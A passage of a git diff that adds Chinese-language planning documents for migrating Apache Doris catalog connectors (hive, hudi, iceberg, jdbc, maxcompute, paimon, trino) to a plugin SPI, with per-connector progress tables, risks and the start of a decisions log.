hudi/iceberg-HMS/paimon-HMS 依赖 | +| **计划迁移阶段** | **P7**(最复杂,6 周)| +| **当前状态** | ⏸ 未启动 | +| **完成度** | 10%(hive 20% + hms 共享库已立) | +| **主 owner** | TBD | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟥 | fe-core 30 个顶层 + `event/`(21 个)+ `source/`(HiveScanNode 等) | +| 2 | 🟥 | fe-connector-hive 12 个文件(scan path + handles);fe-connector-hms 9 个文件 | +| 3 | ⏳ | 反向 instanceof:**31 处**(最高)| +| 4 | ⏳ | `HiveMetadataOps` 全功能未迁;P7.1 重头 | +| 5 | ⏳ | | +| 6 | ✅ | META-INF/services 已注册(HiveConnectorProvider);hms 共享库无 service 注册 | +| 7 | ⏳ | | +| 8-9 | ⏳ | | +| 10 | ⏳ | 清理 31 处反向 instanceof | +| 11 | ⏳ | PhysicalPlanTranslator 删 `HMSExternalTable` 分支(含 dlaType=HIVE/ICEBERG/HUDI 三路)| +| 12 | ⏳ | 0 个测试 | +| 13 | ⏳ | 删 `datasource/hive/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | ✅ 需要 | Hive identity partition + bucket | | +| E2 Procedures | ❌ | n/a | | +| E3 MetaInvalidator | ✅ 需要 | **HMS 21 个 event 类整体搬到 fe-connector-hms** | D-004;P7.2 重头 | +| E4 Transactions | ✅ 需要 | **HMSTransaction(1866 行)+ HiveTransactionMgr 搬到 fe-connector-hive** | P7.3,ACID | +| E5 MvccSnapshot | ❌ | n/a | | +| E6 VendedCredentials | ❌ | n/a | | +| E7 SysTables | ❌ | n/a | | +| E8 ColumnStatistics | ✅ 需要 | Hive ANALYZE column stats 写回 HMS | E8 SPI 的主要消费者 | +| E9 Delete/Merge sink | ✅ 需要 | Hive ACID delete/merge | | +| E10 listPartitions | ✅ 需要 | HMS partition 主消费者 | | + +--- + +## 子阶段(P7.1 - P7.5) + +来自 master plan §3.8: + +| 子阶段 | 范围 | 估时 | +|---|---|---| +| P7.1 | `HiveMetadataOps` 全功能搬到 `HiveConnectorMetadata`(DDL/partition/statistics) | 2 周 | +| P7.2 | event pipeline 21 个类搬到 `fe-connector-hms`;接 `ConnectorMetaInvalidator` | 1.5 周 | +| P7.3 | HMSTransaction + HiveTransactionMgr 搬;ACID 写路径联调 | 2 周 | +| P7.4 | DLA 分流改造(让 `HMSExternalTable` 退化为 PluginDrivenExternalTable 承接) | 0.5 周 | +| P7.5 | 删除 fe-core/hive + 31 处反向 instanceof | 0.5 周 | + +--- + +## 已知特殊性(**最复杂的连接器**) + +- **HMS 是共同后端**:hive、hudi、iceberg-HMS-flavor、paimon-HMS-flavor 都依赖。HMS 连接器必须在 P7 之前就稳定可用(事实上 P3/P5/P6 已经在用 `fe-connector-hms` 共享库)。 +- **21 个 metastore event 类** + `MetastoreEventsProcessor` 后台线程——D-004 决定整体搬到 `fe-connector-hms`。 +- **HMSTransaction 1866 行 + HiveTransactionMgr** —— ACID 事务管理是**最难重写**的部分。R-002 高风险。 +- **HMSExternalTable 1293 行** 处理 hive/hudi/iceberg 三种 dlaType 的分流逻辑。这部分被 D-005 模型吸收。 +- **31 处反向 instanceof** 是所有连接器中最多的,散布在 `nereids/glue/translator`、`tablefunction/MetadataGenerator`、`AnalyzeTableCommand`、`ShowPartitionsCommand` 等。 +- **Kerberos UGI 上下文**——`ConnectorContext.executeAuthenticated` 已支持,但需要逐条审查 HMS 代码路径。 +- 0 个测试(fe-connector-hive 端) → P7 启动前需要建独立 ACID test suite + chaos test(R-002 缓解条件)。 + +--- + +## 关联 + +- 阶段 task:P7(待启动时建) +- 决策:D-002, D-003, D-004, D-005 +- 偏差:(暂无) +- 风险:**R-002(ACID 数据不一致,High)**、R-004(classloader)、R-010(event listener leak) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。当前最复杂的连接器;R-002(ACID 数据不一致)是项目最大风险。 +- 注意:hive 是 hudi/iceberg/paimon 共同的底座(通过 HMS 共享库),P7 启动 = 项目核心冲刺。 diff --git a/plan-doc/connectors/hudi.md b/plan-doc/connectors/hudi.md new file mode 100644 index 00000000000000..5ab858a39cf5b0 --- /dev/null +++ b/plan-doc/connectors/hudi.md @@ -0,0 +1,81 @@ +# Connector: `hudi` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | (依附 hms;通过 `tableFormatType=HUDI` 区分,见 D-005)| +| **fe-connector 模块** | `fe/fe-connector/fe-connector-hudi/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/hudi/` | +| **共享依赖** | `fe-connector-hms`(通过 HMS 拿元数据) | +| **计划迁移阶段** | **P3** | +| **当前状态** | ⏸ 未启动 | +| **完成度** | 20% | +| **主 owner** | TBD | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟡 | fe-core 9 个顶层类(cache key、schema cache、MvccSnapshot、partition utils、HudiUtils)+ `source/` 6 个(含 4 个 incremental relation)| +| 2 | 🟡 | fe-connector 9 个文件:Provider/Metadata/ScanPlanProvider/ScanRange/TableHandle/...| +| 3 | ✅ | 反向 instanceof:0 处(hudi 寄生在 Hive 上,没有独立 `HudiExternalCatalog`)| +| 4 | 🟡 | ConnectorMetadata 骨架完成;incremental query 路径未补 | +| 5 | ⏳ | | +| 6 | ✅ | META-INF/services 已注册 | +| 7 | ⏳ | `SPI_READY_TYPES` 未加(hudi 不能独立创建 catalog)| +| 8-9 | 🚫 | hudi 无独立 catalog;走 D-005 的 `tableFormatType` 模型 | +| 10 | ⏳ | 替换 `visitPhysicalHudiScan` 中 `HMSExternalTable.dlaType=HUDI` 检查 | +| 11 | ⏳ | 删 `HudiScanNode`,由 `PluginDrivenScanNode` + `HudiScanPlanProvider` 承接 | +| 12 | ⏳ | 0 个测试 | +| 13 | ⏳ | 删 `datasource/hudi/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | ❌ | n/a | hudi 不支持 CREATE TABLE | +| E2 Procedures | 🟡 | hudi 有 `archive_log` 等 procedure | 后续可考虑 | +| E3 MetaInvalidator | 🟡 | 通过 HMS event 同步 | 复用 `fe-connector-hms` 的 invalidator | +| E4 Transactions | 🟡 | hudi 有 timeline | 暂用 no-op | +| E5 MvccSnapshot | ✅ 需要 | `HudiMvccSnapshot` 待迁移到 SPI | incremental query 时序 | +| E6 VendedCredentials | ❌ | n/a | | +| E7 SysTables | ❌ | n/a | | +| E8 ColumnStatistics | 🟡 | hudi 有 column stats | 后续 | +| E9 Delete/Merge sink | ❌ | hudi 写路径不在本计划范围 | 与 BE 强耦合 | +| E10 listPartitions | ✅ 需要 | 走 HMS connector 的 listPartitions | | + +--- + +## 已知特殊性(**重要**) + +- **没有独立的 `HudiExternalCatalog`**!hudi 表通过 `HMSExternalTable.dlaType=HUDI` 暴露,本质上是寄生在 Hive 连接器上。 +- D-005 决定:用 `ConnectorTableSchema.tableFormatType=HUDI` 显式建模,由 HMS connector 探测后填充。 +- 4 个 `HoodieIncremental*Relation` 类是和 hudi-spark 库交互——必须在 fe-connector 模块内(classpath 隔离)。 +- P3 实质上要做的是: + 1. 把 `HudiUtils` / `HudiSchemaCacheKey/Value` / `HudiMvccSnapshot` / `HudiPartitionProcessor` 搬到 `fe-connector-hudi`。 + 2. 把 `HudiScanNode` 删除,由 `PluginDrivenScanNode` + 增强后的 `HudiScanPlanProvider`(已存在)承接 incremental relation 逻辑。 + 3. 改造 `PhysicalHudiScan` 让它走 SPI 路径。 +- **P3 启动前必须 P5 paimon 或 P7 hive 进入到至少完成 hms metadata 路径**,否则 hudi 拿不到底层 HMS 表元数据。**这是依赖序的隐藏约束**——见 master plan §3.4 第一段。 + +--- + +## 关联 + +- 阶段 task:P3(待启动时建) +- 决策:D-005(DLA 模型方案 A) +- 偏差:(暂无) +- 风险:(暂无独立的) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。50% 实现已就位,但 P3 依赖 hms-connector 路径先打通(D-005 模型)。 diff --git a/plan-doc/connectors/iceberg.md b/plan-doc/connectors/iceberg.md new file mode 100644 index 00000000000000..eef40dd4335dbb --- /dev/null +++ b/plan-doc/connectors/iceberg.md @@ -0,0 +1,93 @@ +# Connector: `iceberg` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `iceberg` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-iceberg/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/` | +| **共享依赖** | `fe-connector-hms`(iceberg-HMS-flavor 用) | +| **计划迁移阶段** | **P6**(最大阶段,5 周)| +| **当前状态** | ⏸ 未启动 | +| **完成度** | 5% | +| **主 owner** | TBD | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟥 | fe-core 34 个顶层 + `source/`(7) + `action/`(10) + `cache/`(2) + `broker/`(3) + `dlf/`(3) + `fileio/`(4) + `helper/`(3) + `profile/`(1) + `rewrite/`(6) = **73 个文件** | +| 2 | 🟥 | fe-connector 只有 6 个文件(Provider/Metadata/Properties/TableHandle/TypeMapping)—— **骨架**| +| 3 | ⏳ | 反向 instanceof:19 处 | +| 4 | ⏳ | ConnectorMetadata 仅基础 list/get 实现;分子阶段 P6.1-P6.6 全面补 | +| 5 | ⏳ | | +| 6 | ✅ | META-INF/services 已注册 | +| 7 | ⏳ | | +| 8-9 | ⏳ | | +| 10 | ⏳ | 清理 19 处反向 instanceof | +| 11 | ⏳ | PhysicalPlanTranslator 删 `IcebergExternalTable / IcebergSysExternalTable` 分支 | +| 12 | ⏳ | 0 个测试 | +| 13 | ⏳ | 删 `datasource/iceberg/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | ✅ 需要 | 含 transform partition(year/month/day/bucket/truncate)| | +| E2 Procedures | ✅ 需要 | **10 个 action**(rewrite_data_files、expire_snapshots、...) | P6.4 重点 | +| E3 MetaInvalidator | 🟡 | 部分 iceberg-HMS-flavor 需要 | 复用 `fe-connector-hms` | +| E4 Transactions | ✅ 需要 | `IcebergTransaction`(966 行)待迁 | P6.3 | +| E5 MvccSnapshot | ✅ 需要 | `IcebergMvccSnapshot` 待迁 SPI | snapshot/timestamp 时光机 | +| E6 VendedCredentials | ✅ 需要 | `IcebergVendedCredentialsProvider` 待迁 | Iceberg REST 主战场 | +| E7 SysTables | ✅ 需要 | `IcebergSysExternalTable.SysTableType` 9 个 | $snapshots/$history/... | +| E8 ColumnStatistics | 🟡 | snapshot summary | 可选 | +| E9 Delete/Merge sink | ✅ 需要 | `IcebergDeleteSink/MergeSink/TableSink` 删除 | P6.3 | +| E10 listPartitions | ✅ 需要 | | + +--- + +## 子阶段(P6.1 - P6.6) + +来自 master plan §3.7: + +| 子阶段 | 范围 | 估时 | +|---|---|---| +| P6.1 | 元数据 only(7 个 catalog flavor + ConnectorMetadata) | 2 周 | +| P6.2 | scan path(ScanPlanProvider + MVCC + cache) | 1 周 | +| P6.3 | write path(commit/transaction + DML SPI + planner 改造) | 1 周 | +| P6.4 | actions(procedure SPI 接 10 个 action) | 0.5 周 | +| P6.5 | sys tables + metadata columns | 0.5 周 | +| P6.6 | 删除 fe-core/iceberg + 清 19 处反向 instanceof | 0.5 周 | + +--- + +## 已知特殊性(**极重要**) + +- **7 个 catalog flavor**(HMS/Glue/Hadoop/Jdbc/REST/S3Tables/DLF)—— Iceberg SDK 本身有 Catalog 抽象,连接器只需 dispatch property → 实例化哪个 SDK Catalog。 +- **10 个 IcebergXxxAction**(`RewriteDataFiles`、`ExpireSnapshots`、`RollbackToSnapshot`、`CherrypickSnapshot`、`PublishChanges`、`SetCurrentSnapshot`、`RewriteManifests`、`FastForward`、`RollbackToTimestamp`、`PublishChanges`)—— 必须用 P0 新增的 `ConnectorProcedureOps` 承接。 +- **写路径深度耦合**:`IcebergConflictDetectionFilterUtils`、`IcebergConflictDetectionFilterUtils`、`IcebergRowId`、`IcebergMergeOperation` 都和 nereids 优化器纠缠。**P6.3 前必须单独写 `plan-doc/06-iceberg-write-path-rfc.md` 评审方案**(master plan 已注明)。 +- **5400+ 行核心代码**(IcebergMetadataOps 1247 + IcebergTransaction 966 + IcebergUtils 1718 + IcebergScanNode 1228 + IcebergExternalCatalog 241)。 +- **DLA 寄生**:iceberg-on-HMS flavor 通过 `HMSExternalTable.dlaType=ICEBERG` 暴露——D-005 决定用 `tableFormatType` 区分。 + +--- + +## 关联 + +- 阶段 task:P6(待启动时建) +- 决策:D-002, D-005, D-006 +- 偏差:(暂无) +- 风险:R-003(Procedure SPI 抽象失败)、R-004(classloader)、R-005(nereids 写命令耦合)、R-012(snapshotId 类型) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。当前 fe-connector 仅 6 个文件骨架,是所有连接器中 **fe-connector 端最不完整** 的——P6 工作量巨大(5 周)。 diff --git a/plan-doc/connectors/jdbc.md b/plan-doc/connectors/jdbc.md new file mode 100644 index 00000000000000..9d930cf0c8ca38 --- /dev/null +++ b/plan-doc/connectors/jdbc.md @@ -0,0 +1,78 @@ +# Connector: `jdbc` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `jdbc` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-jdbc/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/jdbc/`(残留 13 个方言 client + 1 util) | +| **共享依赖** | 无(独立 plugin) | +| **计划迁移阶段** | 已在 SPI 前置阶段完成,残留清理在 P1 | +| **当前状态** | ✅ 已 SPI 化 + 🚧 旧 client 清理待办 | +| **完成度** | 95% | +| **主 owner** | @me | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 描述 | 状态 | 备注 | +|---|---|---|---| +| 1 | 列出 fe-core 类 | ✅ | 仅剩 13 个 `JdbcClient` + `util/JdbcFieldSchema` | +| 2 | 列出 fe-connector 类 | ✅ | 25 个 java 文件,含 13 个方言 client(新版) | +| 3 | 反向 instanceof grep | ✅ | 0 处(已彻底清理) | +| 4 | 实现 ConnectorMetadata / ScanPlanProvider | ✅ | `JdbcConnectorMetadata`、`JdbcScanPlanProvider` | +| 5 | ConnectorProvider 验证 | ✅ | `JdbcConnectorProvider.validateProperties` 已实现 | +| 6 | META-INF/services | ✅ | `org.apache.doris.connector.jdbc.JdbcConnectorProvider` | +| 7 | `SPI_READY_TYPES` 加入 | ✅ | `CatalogFactory.SPI_READY_TYPES = ["jdbc", "es"]` | +| 8 | gsonPostProcess 迁移 | ✅ | logType JDBC → PLUGIN 已就位 | +| 9 | registerCompatibleSubtype | ✅ | | +| 10 | 替换反向 instanceof | ✅ | | +| 11 | PhysicalPlanTranslator 删分支 | ✅ | | +| 12 | 测试 | ✅ | 13 个测试文件 | +| 13 | 删 fe-core 旧目录 | 🚧 | **P1 处理**:删 `datasource/jdbc/client/Jdbc*Client.java` 13 个 + `util/JdbcFieldSchema.java` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | ❌ | n/a | JDBC 不支持复杂 CREATE TABLE,旧 createTable 已够用 | +| E2 Procedures | ❌ | n/a | | +| E3 MetaInvalidator | ❌ | n/a | JDBC 无 push notification | +| E4 Transactions | 🟡 | 当前 auto-commit | P0 批 0 后改为返回 no-op transaction | +| E5 MvccSnapshot | ❌ | n/a | JDBC 无快照 | +| E6 VendedCredentials | ❌ | n/a | | +| E7 SysTables | ❌ | n/a | | +| E8 ColumnStatistics | 🟡 | 现有 `getTableStatistics` 已有;列级未实现 | 用户 ANALYZE 走 fe-core 缓存 | +| E9 Delete/Merge sink | 🟡 | 当前用 `JDBC_WRITE` 类型 | 不需要 file-based sink | +| E10 listPartitions | ❌ | n/a | JDBC 表无分区 | + +--- + +## 已知特殊性 + +- 13 个方言 client(MySQL/PG/Oracle/SQLServer/ClickHouse/...)每个都有独立的 quoting / type mapping / pushdown 规则。 +- `JdbcUrlNormalizer` 处理各种 vendor 特定 URL 格式。 +- `defaultTestConnection()` 返回 `true`(CREATE CATALOG 时强制验连接)。 +- 旧 fe-core 13 个 `Jdbc*Client` 当前是 dead code(fe-connector 内已有等价实现),但还在 fe-core 编译路径中——P1 删除前要确认没有任何残留引用。 + +--- + +## 关联 + +- 阶段 task:N/A(已完成的连接器);残留清理在 [P1](../tasks/P1-cleanup-and-scan-node.md)(待建) +- 决策:D-001(沿用 PASSTHROUGH_QUERY,JDBC 用到 query() TVF) +- 偏差:(暂无) +- 风险:R-004(classloader 隔离 — JDBC 已验证可行) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。当前状态:已 SPI 化,等待 P1 清理 fe-core 残留方言 client。 diff --git a/plan-doc/connectors/maxcompute.md b/plan-doc/connectors/maxcompute.md new file mode 100644 index 00000000000000..3cbdf87b5fbdc4 --- /dev/null +++ b/plan-doc/connectors/maxcompute.md @@ -0,0 +1,77 @@ +# Connector: `maxcompute` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `max_compute` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-maxcompute/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/` | +| **共享依赖** | 无 | +| **计划迁移阶段** | **P4** | +| **当前状态** | ⏸ 未启动 | +| **完成度** | 25% | +| **主 owner** | TBD | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟡 | fe-core 8 个顶层(ExternalCatalog/Database/Table、MetaCache、MetadataOps、MCTransaction、SchemaCacheValue、McStructureHelper)+ `source/` 2 个 | +| 2 | 🟡 | fe-connector 13 个文件,scan 路径已迁 | +| 3 | ⏳ | 反向 instanceof:12 处(`PhysicalPlanTranslator`、`ShowPartitionsCommand`、`PartitionsTableValuedFunction` 等)| +| 4 | 🟡 | 多数 Metadata 方法已实现;事务相关待补 | +| 5 | ⏳ | | +| 6 | ✅ | META-INF/services 已注册 | +| 7 | ⏳ | | +| 8-9 | ⏳ | gsonPostProcess 加 `max_compute → plugin` 迁移 | +| 10 | ⏳ | 清理 12 处反向 instanceof | +| 11 | ⏳ | PhysicalPlanTranslator 删 `MaxComputeExternalTable` 分支 | +| 12 | ⏳ | 0 个测试 | +| 13 | ⏳ | 删 `datasource/maxcompute/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | 🟡 | MaxCompute 支持 partition | | +| E2 Procedures | ❌ | n/a | | +| E3 MetaInvalidator | ❌ | n/a | | +| E4 Transactions | ✅ 需要 | `MCTransaction` 待迁 SPI | | +| E5 MvccSnapshot | ❌ | n/a | | +| E6 VendedCredentials | ❌ | n/a | | +| E7 SysTables | ❌ | n/a | | +| E8 ColumnStatistics | 🟡 | | +| E9 Delete/Merge sink | ❌ | | +| E10 listPartitions | ✅ 需要 | 走 SPI | + +--- + +## 已知特殊性 + +- 12 处反向 instanceof 是 4 个连接器(trino-connector 2、hudi 0、maxcompute 12、paimon 10)中 trino-connector 的 6 倍量级,是 P4 主要工作。 +- `McStructureHelper` 当前在 fe-core 和 fe-connector 中**重复**,P1 已计划删除 fe-core 版本。 +- 用阿里云 ODPS SDK,classloader 隔离需要测试。 +- 0 个测试 → P4 启动前需要补 mock SDK 测试。 + +--- + +## 关联 + +- 阶段 task:P4(待启动时建) +- 决策:D-002(scan-node 复用) +- 偏差:(暂无) +- 风险:R-004 + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。60% 实现已就位;重复类 `McStructureHelper` 已在 P1 清单。 diff --git a/plan-doc/connectors/paimon.md b/plan-doc/connectors/paimon.md new file mode 100644 index 00000000000000..c5e090b5eb8e48 --- /dev/null +++ b/plan-doc/connectors/paimon.md @@ -0,0 +1,77 @@ +# Connector: `paimon` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `paimon` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-paimon/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/` | +| **共享依赖** | `fe-connector-hms`(paimon-HMS-flavor 用) | +| **计划迁移阶段** | **P5** | +| **当前状态** | ⏸ 未启动 | +| **完成度** | 20%(scan 路径 50%,catalog 路径 10%)| +| **主 owner** | TBD | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟡 | fe-core 22 个顶层 + `source/`(5 个)+ `profile/`(2 个)| +| 2 | 🟡 | fe-connector 10 个文件,scan/predicate/handle 完整 | +| 3 | ⏳ | 反向 instanceof:10 处 | +| 4 | 🟡 | ConnectorMetadata 部分实现;6 个 catalog flavor(HMS/DLF/REST/File/Base/Factory)未迁 | +| 5 | ⏳ | | +| 6 | ✅ | META-INF/services 已注册 | +| 7 | ⏳ | | +| 8-9 | ⏳ | | +| 10 | ⏳ | 清理 10 处反向 instanceof | +| 11 | ⏳ | PhysicalPlanTranslator 删 `PAIMON_EXTERNAL_TABLE` 分支 | +| 12 | ⏳ | 0 个测试 | +| 13 | ⏳ | 删 `datasource/paimon/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | ✅ 需要 | 含 bucket spec | | +| E2 Procedures | 🟡 | paimon 有 expire-snapshots 等 | 后续 | +| E3 MetaInvalidator | 🟡 | paimon-HMS-flavor 需要 | 复用 `fe-connector-hms` | +| E4 Transactions | ✅ 需要 | | +| E5 MvccSnapshot | ✅ 需要 | `PaimonMvccSnapshot` 待迁 SPI | | +| E6 VendedCredentials | ✅ 需要 | `PaimonVendedCredentialsProvider` 待迁 | | +| E7 SysTables | ✅ 需要 | `PaimonSysExternalTable` 待迁 | | +| E8 ColumnStatistics | 🟡 | snapshot summary 已含部分 | 可选 | +| E9 Delete/Merge sink | 🟡 | merge-on-read 路径 | | +| E10 listPartitions | ✅ 需要 | | + +--- + +## 已知特殊性 + +- **6 个 catalog flavor** —— 用工厂模式重组:`PaimonConnectorProvider.create()` 根据 properties 实例化 paimon Catalog。 +- **重复类 `PaimonPredicateConverter`** 在 fe-core 和 fe-connector 两边都有,P1 清理 fe-core 版本。 +- BE 通过 JNI 调用 paimon-reader;连接器通过 `ConnectorScanPlanProvider.getSerializedTable(props)` 序列化 paimon `Table` 对象给 BE。 +- 0 个测试。 + +--- + +## 关联 + +- 阶段 task:P5(待启动时建) +- 决策:D-006(cache 放连接器内)、D-005(HMS flavor 走 tableFormatType) +- 偏差:(暂无) +- 风险:R-004(classloader)、R-012(snapshotId 类型) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。scan 路径已就绪,但 6 个 catalog flavor + MVCC + sys-tables + vended creds 都还在 fe-core。 diff --git a/plan-doc/connectors/trino-connector.md b/plan-doc/connectors/trino-connector.md new file mode 100644 index 00000000000000..2ba1fb6c3662af --- /dev/null +++ b/plan-doc/connectors/trino-connector.md @@ -0,0 +1,78 @@ +# Connector: `trino-connector` + +--- + +## 概况 + +| 项 | 值 | +|---|---| +| **catalog type 名** | `trino-connector` | +| **fe-connector 模块** | `fe/fe-connector/fe-connector-trino/` | +| **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/` | +| **共享依赖** | 无 | +| **计划迁移阶段** | **P2**(首个完整 playbook 实施) | +| **当前状态** | ⏸ 未启动(P0/P1 完成后启动) | +| **完成度** | 30% | +| **主 owner** | TBD(P2 启动前指派) | + +--- + +## 迁移 Playbook 进度 + +| 步骤 | 状态 | 备注 | +|---|---|---| +| 1 | 🟡 | fe-core 旧路径下 6 个顶层类 + `source/`(4 个) | +| 2 | 🟡 | fe-connector 已有 13 个类:Provider/Metadata/ScanPlanProvider/Predicate/PluginManager/...| +| 3 | ⏳ | 反向 instanceof:2 处(仅 `PhysicalPlanTranslator` 与 `LakeSoulScanNode` 附近)| +| 4 | 🟡 | 大部分 ConnectorMetadata 方法已实现,需要核对边界 | +| 5 | ⏳ | validateProperties / preCreateValidation 待补 | +| 6 | ✅ | META-INF/services 已注册 | +| 7 | ⏳ | `SPI_READY_TYPES` 未加 | +| 8 | ⏳ | gsonPostProcess 未加 trinoconnector → plugin 迁移 | +| 9 | ⏳ | registerCompatibleSubtype 未注册 | +| 10 | ⏳ | 替换 2 处反向 instanceof | +| 11 | ⏳ | PhysicalPlanTranslator 删 `TrinoConnectorExternalTable` 分支 | +| 12 | ⏳ | 0 个测试 → 需要补 | +| 13 | ⏳ | 删 `datasource/trinoconnector/` | + +--- + +## SPI 实现完成度 + +| 扩展点 | 是否需要 | 实现状态 | 备注 | +|---|---|---|---| +| E1 CreateTableRequest | 🟡 | 透传到 Trino connector | Trino 自身 CREATE 透传 | +| E2 Procedures | 🟡 | Trino 有 Procedure SPI | 可考虑桥接到 ConnectorProcedureOps | +| E3 MetaInvalidator | ❌ | n/a | Trino 一般无 push notification | +| E4 Transactions | 🟡 | Trino ConnectorTransactionHandle | 桥接到新 ConnectorTransaction | +| E5 MvccSnapshot | 🟡 | 部分 Trino connector 有 | 视具体 plugin 而定 | +| E6 VendedCredentials | ❌ | n/a | | +| E7 SysTables | ❌ | n/a | | +| E8 ColumnStatistics | 🟡 | Trino 有 column stats | | +| E9 Delete/Merge sink | ❌ | 用通用 sink | | +| E10 listPartitions | 🟡 | Trino 有 partition handles | | + +--- + +## 已知特殊性 + +- **第一个完整 playbook 实施样板**——爆炸半径最小(只有 2 处反向 instanceof,没有 transaction/event 负担),用于把整个迁移流程跑通。 +- 包含 Trino plugin loader(`TrinoBootstrap`、`TrinoPluginManager`、`TrinoServicesProvider`)—— classloader 隔离已在 fe-connector 内部完成。 +- 委托给底层 Trino plugin 处理元数据,本质是"trino-on-doris"包装层。 +- 0 个测试——P2 启动前需要补单元测试 + 至少一个集成测试(用 mock Trino plugin)。 + +--- + +## 关联 + +- 阶段 task:P2(待启动时建 `tasks/P2-trino-connector.md`) +- 决策:D-002(scan-node 复用 FileQueryScanNode) +- 偏差:(暂无) +- 风险:R-004(classloader 隔离 — Trino plugin loader 是主要测试点) + +--- + +## 进度日志 + +### 2026-05-24 +- 跟踪文件建立。70% 实现已就位,等 P0/P1 完成后启动 P2 整体推动。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md new file mode 100644 index 00000000000000..422fac3195b5fd --- /dev/null +++ b/plan-doc/decisions-log.md @@ -0,0 +1,260 @@ +# 决策日志(ADR) + +> **Append-only**:新决策置顶;旧决策永不删除(即使被推翻,也只标"已废止"而不删除)。 +> 编号规则:`D-NNN` 三位数字,从 001 起单调递增,永不复用。 +> 历史决策 D1-D12(master plan §5)+ U1-U6(RFC §16.2)已迁入并映射到 D-001..D-018。 +> 与"偏差"的区别见 [README §3.1](./README.md)。 +> +> 每条决策模板见文末 §附录。 + +--- + +## 📋 索引 + +> 时间倒序;带 ✅ 表示生效中,❌ 表示已废止,🟡 表示待评审 + +| 编号 | 别名 | 简述 | 日期 | 状态 | +|---|---|---|---|---| +| D-018 | U6 | `ConnectorColumnStatistics` 用 javadoc 类型映射表 + IAE 保证类型安全 | 2026-05-24 | ✅ | +| D-017 | U5 | sys-table 命名统一 `$suffix`,别名机制留待未来 | 2026-05-24 | ✅ | +| D-016 | U4 | `getCredentialsForScans` 批量化,返回 `Map` | 2026-05-24 | ✅ | +| D-015 | U3 | `ConnectorTransaction.getTransactionId` 由连接器分配 | 2026-05-24 | ✅ | +| D-014 | U2 | 不新增 `invalidateColumnStatistics`,挂在 `invalidateTable` | 2026-05-24 | ✅ | +| D-013 | U1 | `ConnectorProcedureOps.listProcedures` 一次性返回,生命周期稳定 | 2026-05-24 | ✅ | +| D-012 | D12 | 用户安装 connector 后初版强制重启 FE | 2026-05-24 | ✅ | +| D-011 | D11 | `RemoteDorisExternalCatalog` 长期做 connector,不在本计划主线 | 2026-05-24 | ✅ | +| D-010 | D10 | `LakeSoulExternalCatalog` 在 P8 删除剩余类 | 2026-05-24 | ✅ | +| D-009 | D9 | API 版本号本计划范围内永不 +1,只新增 default 方法 | 2026-05-24 | ✅ | +| D-008 | D8 | 生产环境不允许 built-in connector,强制目录式插件 | 2026-05-24 | ✅ | +| D-007 | D7 | kafka/kinesis/odbc/doris 子目录不在本计划范围 | 2026-05-24 | ✅ | +| D-006 | D6 | Iceberg snapshot/manifest cache 放连接器内,fe-core 不感知 | 2026-05-24 | ✅ | +| D-005 | D5 | hudi/iceberg-on-HMS 用 `ConnectorTableSchema.tableFormatType` 区分 | 2026-05-24 | ✅ | +| D-004 | D4 | HMS event pipeline 放 `fe-connector-hms`,通过 `ConnectorMetaInvalidator` 回调 | 2026-05-24 | ✅ | +| D-003 | D3 | 旧 `*ExternalCatalog` 子类**全部删除**,不保留中间形态 | 2026-05-24 | ✅ | +| D-002 | D2 | `PluginDrivenScanNode` 长期保持 `extends FileQueryScanNode` | 2026-05-24 | ✅ | +| D-001 | D1 | 沿用已有 `SUPPORTS_PASSTHROUGH_QUERY`,不新增 query SPI | 2026-05-24 | ✅ | + +--- + +## 详细记录(时间倒序) + +### D-018 — `ConnectorColumnStatistics` 类型安全契约(原 U6) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §11.2](./01-spi-extensions-rfc.md) +- 